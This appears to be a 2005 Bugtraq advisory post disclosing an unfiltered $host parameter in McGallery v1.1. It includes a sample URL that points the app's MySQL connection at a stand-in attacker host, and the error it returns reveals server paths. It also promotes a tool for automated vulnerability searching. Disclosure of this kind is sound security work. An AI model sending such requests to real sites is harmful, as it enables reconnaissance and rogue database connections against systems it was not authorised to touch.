Bugtraq mailing list archives
Vulnerability: McGallery v 1.1 Mysql DB including
From: D_BuG <d_bug () bk ru>
Date: Wed, 15 Jun 2005 17:58:19 +0400
Vendor: Phpforum, http://www.phpforums.net/ Product: McGallery v 1.1 Vulnerability: mysql including Consequences: Web server paths Risk: Low Description: Unfiltered $host variable. Allows attacker to connect to fake DB and make select from it. http://example.com/mcgallery/show.php?host=attackhost Warning: mysql_connect(): Unknown MySQL Server Host 'attackhost' (11001) in x:\home\test1.ru\www\mcgallery\show.php on line 9 Discoveried By D_BuG d_bug () bk ru NemesisSecurityTeam http://nemesisoftware.com/ CheckZond free v. 1.0 http://nemesisoftware.com/products.htm uses the vulnerabilities above for automatic vulnerabilities search (Google Hacking technique) and usage. -- Best regards, D_BuG mailto:d_bug () bk ru
Current thread:
- Vulnerability: McGallery v 1.1 Mysql DB including D_BuG (Jun 15)